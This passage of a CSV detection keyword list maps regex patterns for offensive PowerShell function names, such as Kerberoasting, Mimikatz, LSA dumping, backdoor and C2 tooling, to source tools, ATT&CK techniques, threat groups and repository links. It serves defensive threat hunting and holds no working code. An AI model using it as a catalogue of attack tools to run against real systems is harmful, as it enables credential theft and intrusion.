Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49133"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49134"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49135"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49136"
"*Invoke-Kerberoast*",".{0,1000}Invoke\-Kerberoast.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","49137"
"*Invoke-Kerberoast.ps1*",".{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49138"
"*Invoke-Keylogger*",".{0,1000}Invoke\-Keylogger\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49139"
"*Invoke-Kirby*",".{0,1000}Invoke\-Kirby.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49140"
"*Invoke-KrbRelay*",".{0,1000}Invoke\-KrbRelay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49141"
"*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49142"
"*Invoke-LapsCheck*",".{0,1000}Invoke\-LapsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49143"
"*Invoke-LazySign.ps1*",".{0,1000}Invoke\-LazySign\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49144"
"*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49147"
"*Invoke-LdapSignCheck*",".{0,1000}Invoke\-LdapSignCheck.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49148"
"*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49149"
"*Invoke-LocalAdminGroupCheck*",".{0,1000}Invoke\-LocalAdminGroupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49150"
"*Invoke-Lockless*",".{0,1000}Invoke\-Lockless.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49151"
"*Invoke-Locksmith.ps1*",".{0,1000}Invoke\-Locksmith\.ps1.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","49152"
"*Invoke-LockWorkStation*",".{0,1000}Invoke\-LockWorkStation.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49153"
"*Invoke-LoginPrompt.ps1*",".{0,1000}Invoke\-LoginPrompt\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","49154"
"*Invoke-LoopBackdoor*",".{0,1000}Invoke\-LoopBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49155"
"*Invoke-LSADump *",".{0,1000}Invoke\-LSADump\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49156"
"*Invoke-LSADump*",".{0,1000}Invoke\-LSADump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49157"
"*Invoke-LsaProtectionCheck*",".{0,1000}Invoke\-LsaProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49158"
"*Invoke-LsaProtectionsCheck*",".{0,1000}Invoke\-LsaProtectionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49159"
"*Invoke-LSWMImplant*",".{0,1000}Invoke\-LSWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49160"
"*Invoke-M.i.m.i.k.a.t.z*",".{0,1000}Invoke\-M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49161"
"*Invoke-MachineRoleCheck*",".{0,1000}Invoke\-MachineRoleCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49162"
"*Invoke-MailSearch*",".{0,1000}Invoke\-MailSearch.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49163"
"*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49165"
"*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49166"
"*Invoke-MapDomainTrust*",".{0,1000}Invoke\-MapDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49167"
"*Invoke-MassCommand.ps1*",".{0,1000}Invoke\-MassCommand\.ps1.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49168"
"*Invoke-MassMimikatz*",".{0,1000}Invoke\-MassMimikatz.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49169"
"*Invoke-MassSearch.ps1*",".{0,1000}Invoke\-MassSearch\.ps1.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49170"
"*Invoke-MassTokens.ps1*",".{0,1000}Invoke\-MassTokens\.ps1.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49171"
"*Invoke-MDExclusionParser *",".{0,1000}Invoke\-MDExclusionParser\s.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","49172"
"*Invoke-Medusa *",".{0,1000}Invoke\-Medusa\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","49173"
"*Invoke-Merlin.ps1*",".{0,1000}Invoke\-Merlin\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","49174"
"*Invoke-MetasploitPayload*",".{0,1000}Invoke\-MetasploitPayload.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49175"
"*Invoke-MetasploitPayload*",".{0,1000}Invoke\-MetasploitPayload.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49176"
"*Invoke-MetasploitPayload.ps1*",".{0,1000}Invoke\-MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49177"
"*Invoke-MetasploitPayload.ps1*",".{0,1000}Invoke\-MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49178"
"*Invoke-MetaTwin*",".{0,1000}Invoke\-MetaTwin.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","49179"
"*InvokeMeter.bat*",".{0,1000}InvokeMeter\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49180"
